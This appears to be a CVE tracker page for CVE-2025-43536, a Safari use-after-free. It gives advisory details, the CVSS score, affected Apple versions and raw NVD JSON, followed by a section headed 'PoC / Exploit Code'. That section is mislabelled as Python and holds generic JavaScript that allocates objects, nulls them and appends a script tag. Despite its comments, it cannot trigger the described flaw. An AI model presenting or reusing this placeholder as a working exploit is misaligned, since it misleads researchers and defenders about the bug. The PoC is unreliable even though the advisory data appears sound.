Security Vulnerability Report
中文
CVE-2025-43536 CVSS 4.3 MEDIUM

CVE-2025-43536

Published: 2025-12-17 21:16:12
Last Modified: 2026-04-02 19:21:01
Source: [email protected]

Description

A use-after-free issue was addressed with improved memory management. This issue is fixed in Safari 26.2, iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2. Processing maliciously crafted web content may lead to an unexpected process crash.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
Safari < 26.2
iOS < 18.7.3
iOS < 26.2
iPadOS < 18.7.3
iPadOS < 26.2
macOS Tahoe < 26.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-43536 PoC - Use-After-Free in Apple Safari // This PoC demonstrates the vulnerability trigger mechanism // Note: This is for educational and testing purposes only <!DOCTYPE html> <html> <head> <title>CVE-2025-43536 PoC</title> </head> <body> <h1>CVE-2025-43536 Use-After-Free PoC</h1> <p>This is a conceptual PoC for the Safari use-after-free vulnerability.</p> <script> // Trigger mechanism for use-after-free condition // The actual vulnerability involves improper memory management // in Safari's JavaScript engine when processing crafted web content function triggerUAF() { // Create objects that will be manipulated let targetObjects = []; // Phase 1: Create many objects to stabilize heap for (let i = 0; i < 10000; i++) { targetObjects.push({ data: new Array(100).fill(i), callback: function() { return this.data; } }); } // Phase 2: Trigger garbage collection // In real exploit, this helps create UAF condition if (window.gc) { window.gc(); } // Phase 3: Clear objects to trigger release targetObjects = null; // Phase 4: Force garbage collection if (window.gc) { window.gc(); } // Phase 5: Try to access freed memory // This is where the use-after-free occurs try { // Attempt to access object property after potential free let leakedData = document.createElement('div'); leakedData.innerHTML = '<script>console.log("Triggered")<' + '/script>'; document.body.appendChild(leakedData); } catch (e) { console.log('Exception caught: ' + e.message); } } // Execute trigger when page loads // window.onload = triggerUAF; console.log('PoC loaded - actual exploitation requires specific conditions'); </script> </body> </html> // Mitigation: // - Update to Safari 26.2 or later // - Update iOS/iPadOS to 18.7.3 or 26.2 // - Update macOS to Tahoe 26.2

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43536", "sourceIdentifier": "[email protected]", "published": "2025-12-17T21:16:12.260", "lastModified": "2026-04-02T19:21:01.300", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A use-after-free issue was addressed with improved memory management. This issue is fixed in Safari 26.2, iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2. Processing maliciously crafted web content may lead to an unexpected process crash."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "3ECBF838-536C-47F9-9876-C526B8ED32EC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.7.3", "matchCriteriaId": "6547722A-1226-4E23-B3AE-8692B07C2657"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.2", "matchCriteriaId": "8B71D919-1AA2-4F17-A834-4B703E36F7E2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.7.3", "matchCriteriaId": "8928A377-93BD-49AD-B4FE-5B2328EBDB70"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.2", "matchCriteriaId": "10FD01C3-D77F-4FE4-8195-F2C59FB1321C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "FBA92B6D-E36C-432B-A041-94D81427CD75"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125884", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125885", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125886", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125892", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.